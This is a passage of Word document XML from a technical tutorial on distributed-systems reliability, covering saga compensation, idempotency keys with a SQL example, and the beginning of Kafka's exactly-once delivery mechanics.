    <w:p w14:paraId="6D226E25" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>T1 → T2 → T3 → T4 (success: all complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE87E0C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>T1 → T2 → T3 (fails) → C2 → C1 (compensate in reverse)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E386EE5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Orchestration approach (central coordinator):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36032D8B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="456"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Saga Orchestrator executes T1 (create order).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F70BFB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="456"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If success, executes T2 (reserve inventory).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9377E5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="456"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If success, executes T3 (charge payment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166B729F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="456"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If T3 fails, orchestrator executes C2 (release inventory), then C1 (cancel order).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3318FCDA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Choreography approach (event-driven):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A90EC9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="457"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Order Service executes T1, emits "OrderCreated" event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A91BD2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="457"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Inventory Service hears event, executes T2, emits "InventoryReserved."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029D2939" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="457"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Payment Service hears event, executes T3. If fails, emits "PaymentFailed."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624332B1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="457"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Inventory Service hears "PaymentFailed," executes C2 (release inventory).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FC98FA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="457"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Order Service hears "PaymentFailed," executes C1 (cancel order).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63859625" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reliability concerns in sagas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DDF5CA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="458"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compensating actions must be idempotent:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> If C2 is delivered twice (network retry), it must not release inventory twice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2B12E2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="458"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compensating actions can fail:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> What if the "release inventory" call fails? You need retry logic with dead-letter queues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B805365" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="458"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Semantic vs. atomic rollback:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A compensating action is not a true rollback. "Refund payment" is not the same as "payment never happened." The customer sees a charge and then a refund on their statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050C4E18" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="458"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observable intermediate states:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Between T2 and T3, the system is in an inconsistent state (inventory reserved but payment not yet processed). Other transactions may observe this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441CA0B2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="34A51B45">
          <v:rect id="_x0000_i2937" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="194DAC6D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Idempotency — Making Operations Safely Retryable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DC8A51" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 Why Idempotency is Critical for Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB33285" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>In an unreliable network, you cannot guarantee exactly-once delivery. You can only choose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA60423" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>At-most-once:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Send and forget. Might be lost. (Unreliable.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF99B2A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>At-least-once:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Retry until acknowledged. Might be duplicated. (Reliable delivery but needs deduplication.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C27C0B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exactly-once:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Requires at-least-once delivery + idempotent processing. (The gold standard.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041D670D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 Implementing Idempotency — Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770701E9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Idempotency key approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E13D94" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="460"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Client generates a unique key (UUID) for each logical operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7604535E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="460"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Client includes this key in every request (and retries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFF3FFA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="460"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Server receives request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414612FE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="460"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Check idempotency key store: "Have I seen key=abc-123 before?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38536474" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="460"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If NO: process the operation, store the result keyed by abc-123, return result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7241893C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="460"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If YES: return the stored result without re-executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573AAD7E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The idempotency key store:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011EADCB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="461"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Must be durable (survive crashes) — otherwise a crash causes duplicate processing on retry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FDF142" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="461"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Must be checked atomically with the operation (otherwise race condition: two retries both check "not seen" before either stores).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791D2067" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="461"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Typical implementation: within the same database transaction as the business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D711A4C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270AB60B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>BEGIN TRANSACTION;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F69524" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">INSERT INTO idempotency_keys (key, result) VALUES ('abc-123', ...) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC47B6A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  ON CONFLICT DO NOTHING RETURNING ...;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BF7C96" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>-- If inserted: proceed with business logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071B2956" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>-- If conflict: return existing result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380D8D7B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF96BDB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How Stripe implements idempotency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DABACB7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="462"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Every mutating API request can include an Idempotency-Key header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0DC192" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="462"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Stripe stores the key + request parameters + response for 24 hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C7D6C2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="462"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Same key + same parameters = return cached response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D86865A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="462"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Same key + different parameters = return error (prevents misuse).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDCF52C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="462"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Key expires after 24 hours (assumes client shouldn't retry after that long).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B69374" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.3 Natural Idempotency vs. Designed Idempotency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E43B21D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Naturally idempotent operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1614EEBC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="463"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>SET balance = 500 — setting to absolute value, repeating is harmless.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1760DD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="463"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>DELETE WHERE id = 123 — deleting again has no effect (already gone).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EBCB76" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="463"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>PUT /resource/123 {full body} — replacing entirely, repeating produces same state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE94B27" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOT naturally idempotent (need design):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF4F67B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="464"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>INCREMENT balance BY 100 — repeating adds $100 again. Must track whether this specific increment was already applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A081F6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="464"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>POST /orders — repeating creates duplicate orders. Needs idempotency key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA67377" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="464"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>INSERT INTO table VALUES (...) — repeating creates duplicate rows (unless there's a unique constraint that makes it naturally idempotent).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA85F70" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="3D13F4BE">
          <v:rect id="_x0000_i2938" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79624944" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Exactly-Once Semantics — The Holy Grail of Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA1A007" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 The Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3584FCCB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A message broker delivers a message to a consumer. The consumer processes it, but crashes before acknowledging. The broker re-delivers. The consumer processes it again → duplicate effect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E2BFD4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 How Kafka Achieves Exactly-Once</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE5F7D1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Producer side — Idempotent Producer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0360D190" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="465"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Each producer is assigned a Producer ID (PID) by the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3454437A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="465"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Each message gets a sequence number (per partition): 0, 1, 2, 3...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAD61B6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="465"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Broker tracks the latest sequence number per PID per partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598A340B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="465"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If a broker receives sequence N and already has N in the log → duplicate, rejected (silently deduped).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FB7B4A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="465"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If a broker receives sequence N+2 when it expects N+1 → gap, error (means messages were lost).</w:t>
      </w:r>
    </w:p>
